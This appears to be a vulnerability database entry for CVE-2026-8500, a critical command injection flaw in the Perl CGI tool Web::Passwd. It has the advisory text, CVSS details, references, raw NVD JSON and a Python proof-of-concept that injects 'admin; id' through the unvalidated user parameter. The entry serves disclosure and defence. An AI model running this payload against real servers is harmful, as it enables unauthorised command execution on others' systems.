CVE-2026-8500

Description

Web::Passwd versions through 0.03 for Perl is vulnerable to RCE. Web::Passwd is a small CGI application for managing htpasswd files using the htpasswd command. The user parameter is not validated or escaped, and is used as the last argument on the command line, allowing for command injection.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Web::Passwd <= 0.03

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable Web::Passwd CGI script
target_url = "http://target/cgi-bin/web-passwd.cgi"

# Malicious payload to execute 'id' command via command injection
# The 'user' parameter is vulnerable to injection
payload = {
    "user": "admin; id",  # Injection payload
    "passwd": "password"
}

try:
    # Send the POST request with the malicious payload
    response = requests.post(target_url, data=payload)

    # Check if the command execution output is present in the response
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response body:")
        print(response.text)
        
        # Example: Check for 'uid=' which indicates 'id' command output
        if "uid=" in response.text:
            print("[!] Command injection successful!")
        else:
            print("[-] Command injection may have failed or output is hidden.")
    else:
        print(f"[-] Server returned status code: {response.status_code}")

except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8500
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8500
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8500/
[4] VulDB https://vuldb.com/cve/CVE-2026-8500
[5] https://httpd.apache.org/docs/current/programs/htpasswd.html
[6] https://metacpan.org/release/EVANK/Web-Passwd-0.03
[7] http://www.openwall.com/lists/oss-security/2026/05/13/8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8500", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-13T23:16:43.237", "lastModified": "2026-05-14T18:16:51.490", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Web::Passwd versions through 0.03 for Perl is vulnerable to RCE.\n\nWeb::Passwd is a small CGI application for managing htpasswd files using the htpasswd command.\n\nThe user parameter is not validated or escaped, and is used as the last argument on the command line, allowing for command injection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://httpd.apache.org/docs/current/programs/htpasswd.html", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/EVANK/Web-Passwd-0.03", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/13/8", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}